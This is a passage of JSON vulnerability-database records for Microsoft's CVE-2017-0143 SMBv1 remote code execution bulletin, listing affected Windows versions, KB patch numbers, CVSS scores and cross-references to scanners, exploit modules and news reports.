{"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T08:53:53", "differentElements": ["msAffectedSoftware"], "edition": 78}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-28T22:45:57", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012216", "KB3210721", "KB4012598", "KB4013198", "KB4012217", "KB3210720", "KB4012606", "KB3212646", "KB3205401", "KB4012214", "KB4012215", "KB4012212", "KB4012213", "KB3205409", "KBMS16-110, 3187754", "KB3213986", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T22:45:57", "differentElements": ["msAffectedSoftware"], "edition": 79}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-29T08:51:23", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013198", "KB3212646", "KB4012216", "KB4012214", "KB4012213", "KB3205401", "KB3177186", "KB4012212", "KB3210720", "KB3210721", "KB4012217", "KB3205409", "KB4012215", "KB4012606", "KBMS16-110, 3187754", "KB4012598", "KB3213986", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": 